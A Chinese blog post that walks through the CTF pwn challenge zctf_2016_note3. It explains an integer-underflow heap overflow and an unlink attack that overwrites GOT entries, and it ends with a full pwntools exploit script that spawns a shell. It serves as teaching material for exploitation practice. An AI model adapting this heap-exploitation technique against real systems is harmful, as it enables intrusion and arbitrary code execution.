zctf_2016_note3 详解

最新推荐文章于 2023-06-23 21:22:48 发布
最新推荐文章于 2023-06-23 21:22:48 发布
阅读量538 收藏 3
点赞数
分类专栏: ctf pwn 文章标签: pwn 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/One_p_Two_w/article/details/121142272
版权
ctf 同时被 2 个专栏收录
5 篇文章 0 订阅
订阅专栏
pwn
3 篇文章 0 订阅
订阅专栏

zctf_2016_note3 详解

题目可以在buu上找到,ibc版本为2.23

和wiki做的不一样,wiki那个我还没看懂,改天再研究研究orz

查看保护机制

在这里插入图片描述

题目分析

是个菜单题,提供了新建note、打印note、编辑note、删除note四个功能在这里插入图片描述

添加note

​ 最多添加七个note,每个note大小在0-0x400之间,申请到的堆空间地址会放在ptr指针处

在这里插入图片描述

漏洞在edit功能模块

​ 当a2 = 0时,由于i为unsigned_int,-1相当于无穷大,会造成无限制读入,令我们可以覆盖后面的堆块

在这里插入图片描述

show是假的

​ 另外需要注意的是show函数并没有实现打印功能,那么通过打印堆块内容泄露libc的办法就不可行了

在这里插入图片描述

delete

在这里插入图片描述

整合思路

要做的事情有两个

  1. 泄露libc
  2. getshell

整合上面得到的信息,由于show函数并没有实现打印功能,那么通过fastbin attack打印fd泄露libc的办法就不可行了,不过我们注意到申请到的堆块指针全部放在ptr中,并且在delete函数中free对指针进行了直接操作,那么可以通过unlink挟持got表到ptr,之后通过打印got表和篡改got表来实现泄露和getshell

具体实现如下:

覆盖free为puts实现打印功能,通过unlink覆盖ptr为free_got表以及atoi_got表,然后通过edit 可以篡改free_got为puts_plt实现打印功能。

ptr已经被覆盖,我们可以直接打印atoi_got表中的函数地址来泄露libc,通过篡改atoi_got表为system来实现getshell

unlink过程详解

我们首先申请0、0x100、0x100、0x100的堆块,如图左所示,记作chunk0-3

为了unlink我们需要一个假的空闲的堆块,这里选择在ptr[2]处进行伪造,我们希望free(ptr[1])造成chunk1和fake_chunk的合并

为了让glibc相信这个fake chunk就是chunk2,我们需要修改chunk1和chunk2的size,以及chunk3的prevsize

为了让glibc相信fake chunk是空闲的,需要修改chunk3的prev_inuse标志位

(其实不伪造的这么精致也可以,比如让fake_chunk只有0x70大,只要fake_chunk + 8位置的prev_inuse标志位能对上就行)

payload = p64(0) * 3 + p64(0x121) + b'a' * 0x110 
payload += p64(0) + p64(0x101) + p64(fd) + p64(bk) + b'a' * (0x100-0x20) 
payload += p64(0x100) + p64(0x110)

在这里插入图片描述
执行unlink之后,ptr[2] = ptr[2] - 0x18 = ptr - 0x8

之后编辑ptr[2],就可以覆盖ptr区域存储的指针,就可以实现对got表的打印和修改了

exp:

from pwn import *

context(log_level = 'debug', arch = 'amd64', os = 'linux')

io = process('./zctf_2016_note3')
# io = remote('node4.buuoj.cn', 26242)
# gdb.attach(io)

elf = ELF('./zctf_2016_note3')
libc = ELF('./libc-2.23.so')

def new(size, content):
    io.recvuntil(b'>>\n')
    io.sendline(b'1')
    io.recvuntil(b'1024)\n')
    io.sendline(size)
    io.recvuntil(b'content:\n')
    io.sendline(content)

def show():
    io.recvuntil(b'>>\n')
    io.sendline(b'2')

def edit(idx, content):
    io.recvuntil(b'>>\n')
    io.sendline(b'3')
    io.recvuntil(b'note:\n')
    io.sendline(idx)
    io.recvuntil(b'content:\n')
    io.sendline(content)

def delete(idx):
    io.recvuntil(b'>>\n')
    io.sendline(b'4')
    io.recvuntil(b'note:\n')
    io.sendline(idx)

ptr = 0x6020C8

new(b'0', b'aaaa')      # idx 0
new(b'256', b'aaaa')    # idx 1
new(b'256', b'aaaa')    # idx 2
new(b'256', b'aaaa')    # idx 3
# delete(b'2')

# 伪造idx 2的free状态和fd bk
fd = ptr + 0x10 - 0x18
bk = ptr + 0x10 - 0x10

payload = p64(0) * 3 + p64(0x121) + b'a' * 0x110 
payload += p64(0) + p64(0x101) + p64(fd) + p64(bk) + b'a' * (0x100-0x20) 
payload += p64(0x100) + p64(0x110)

edit(b'0', payload)

# 触发unlink,free(1)使1和2合并
delete(b'1')

free_got = elf.got['free']
atoi_got = elf.got['atoi']
puts_plt = elf.plt['puts']

# 覆盖ptr里的堆地址
payload = b'a' * 0x8 + p64(free_got) + p64(atoi_got) + p64(atoi_got) + p64(atoi_got)
edit(b'2', payload)

# 泄漏atoi_got
edit(b'0', p64(puts_plt)[:-1])
delete(b'2')
atoi_addr = u64(io.recvline()[:-1].ljust(8, b'\x00'))
print('atoi_addr -> ' + hex(atoi_addr))

libc_addr = atoi_addr - libc.symbols['atoi']
system_addr = libc.symbols['system'] + libc_addr

# 修改atoi_got为system地址
edit(b'3', p64(system_addr)[:-1])

io.recvuntil(b'>>\n')
io.sendline(b'/bin/sh')

io.interactive()
长亭一梦
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
CTF内存取证三项.7z
11-16
CTF取证分析赛题,对学习有很大帮助。
unlink zctf 2016 note3
qq_36918532的博客
01-19 2421
这个跟note2很相似,仍然是一个unlink问题,,,不同的是没法打印泄露了 详情请参考,note2 查看检查 在IDA里面看,发现其有增加,修改,删除,打印的功能 其中增加的功能: 发现0x6020c0地方存放的是当前堆ptr,0x6020c0[i+8]存放的是其大小 也就是其布局是这样的:cur_ptr | ptr0 | ptr1 | … | ptr6 | cur_size | size_ptr0 | size_ptr…| size_ptr6 在输入size有个函数sub4009b9()中的sub
zctf_2016_note3
z1r0的博客
02-25 170
zctf_2016_note3 查看保护 这里假如size为0的时候,会有一个非常大的溢出(整型溢出)。因为i是unsigned类型,而a2是int类型,比较的时候会溢出。0 - 1 > i 攻击思路:创建一个size为0的堆块时,在edit的时候就可以将下面的堆块进行覆盖。这里笔者采用的是unlink攻击。具体的攻击方法见z1r0’s blog。通过unlink劫持got表。将free_got改为puts_plt这个时候可以泄露libc。再将atoi_got改为system,再传入/bin/sh
zctf_2016_note3【buuctf刷题 unlink】
最新发布
m0_73756460的博客
06-23 62
zctf_2016_note3【buuctf刷题 unlink】
note-3
qq_44713358的博客
04-01 192
图   图是研究离散对象的最常用和最基础的概念,这里我们暂不关注其应用,只看相关算法。   最简单的图如上所示,边只表示“两个点相连”,是“无权”、“无向”的。   另一方面,有些图的边是单向的(类似交通图中的单行道),这类图被称为有向图;另一些图图的边也可以加入权重,被称为有权图 储存方式   在数学上,图一般被表示为二元组G=(V,E)G=(V,E)G=(V,E),VVV表示节点,EEE表示连接节点的边。(具体上怎么储存是很自由的)   从数据结构上来讲,图可以表示为: class Graph:
zctf_2016_note3(整数溢出,unlink)
m0_51251108的博客
11-06 220
zctf_2016_note3: 好像没show? 逆向分析: 主界面: add函数: show函数: show假的 edit函数: 我们跟进这个函数, size-1跟一个无符号int作比较,如果size为0的话,就能造成任意大小堆溢出 delete函数: 指针释放干净了 思路: 我们申请size为0的chunk堆溢出,伪造chunk,触发unlink,改写free的got表为atoi 在填入/bin/sh exp: from pwn import * #from LibcSearcher i
BUUCTF zctf_2016_note3
doudoudedi
01-13 478
一道典型的unlink题目整形溢出因为i是无符号长整型如果输入-1就会变得巨大实现堆溢出这里应该可以用unlink泄露libc基址然后用fastbin attack打malloc_hook但是这里有多次写入的edit功能就很好做了 先申请4个chunk 然后unlink一个指针到bss段上 unlink的操作fake chunk的fd和bk必须指回自己也就是一个确定的值具体为 `` fake ch...
[BUUCTF]zctf2016_note2
zyxx_wjc的博客
08-13 1125
BUUCTF刷题wp分享:zctf2016_note2
[Buuoj]zctf2016_note2
zylxixixi的博客
11-10 315
思路一: 利用house系列的中的house of force,将goodbye_message的地址覆盖为magic的地址,从而输出flag地址 思路二 利用unlink漏洞,泄露libc基址并且将atoi的got表项修改为system的地址,最后输入/bin/sh
ZCTF - 2016 - Reverse100
风靡义磊的博客
07-21 1788
ZCTF2016的第一道逆向
ZCTF2017 WEB Writeup
Bendawang's Blog
02-27 3766
ZCTF2017 WEB Writeup
2016 ZCTF——note3
04-20 273
64位程序,没开PIE  #unlink #整数溢出 程序逻辑 1 void __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 setvbuf(stdin, 0LL, 2, 0LL); 4 setvbuf(stdout, 0LL, 2, 0LL); 5 setvbuf(stder...
2016_ZCTF_Pwn note2(unlink)
Pwnpanda的博客
08-05 587
暑假学习计划 - 0x03 2016_ZCTF_note2 详细分析参考:CTF Wiki 肝了一下午 + 一晚上,还是有一部分还不是很理解: ①为什么payload1后面一定要加上p64(64)+p64(0x60),为什么不能删除或者改大小; ②分配的三个堆块,为什么第一个和第三个大小一定是0x80; 路过的各位大佬,如果知道麻烦指点一些,谢谢啦 from pwn import...
unlink 2016 zctf note2
qq_36918532的博客
01-18 141
题目可在buuctf下载 这章还是unlink的复习 拖到IDA里面可以看到,开头让输入名字,地址(其实没卵用) 然后看下面的菜单分别是新增,打印,编辑,释放 在新增功能中size是无符号数,所以当size为0的时候,0-1之后为无穷大的数,也就是能向堆中写入无穷大的数0xffff…,根据glibc规定会分配0X20个字节,但是读取的时候不受限制,会产生堆溢出 并且最多四个堆块 同时我们可以看出ptr是存放content的地址(0x602120),id存放在0x602160,size存放在0x602140
2016 ZCTF note2
Morphy_Amo的博客
01-27 2614
堆溢出中unlink的应用
android ctf 分析,Android逆向笔记 - ZCTF2016题解
weixin_39590635的博客
05-27 422
这是2016zctf的一道Android题目,样本和本文用到的部分工具在文章末尾可以下载0x01 第一部分 静态分析安装运行apk,需要输入用户名和密码,用户名为zctf,用jeb工具反编译文件结构如下:图1如图 assets目录中有三个文件,bottom、flag.bin、key.db,还有一个JNIclass库。图2程序开始,先检查密码的长度(至少4位),然后调用auth方法验证用户名密码是...
zctf2016_note2
z1r0的博客
02-02 574
zctf2016_note2 查看保护 这是一个漏洞点。在edit的时候 ,选择append时就会产生越界,如果size开始为0,则v1[v6 - strlen(&dest) + 14] <= 14了,所以在执行strncat时可以无限附加覆盖下一个堆块。所以可以申请fastbin,因为可以覆盖后面的堆块,在name中伪装假的堆块,然后对其进行释放这样再申请时就会得到其地址,从而改写指针 简单理解的话就是size为0的chunk可以无限追加数据。然后追加到最后可以修改heap_ptr那里的
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值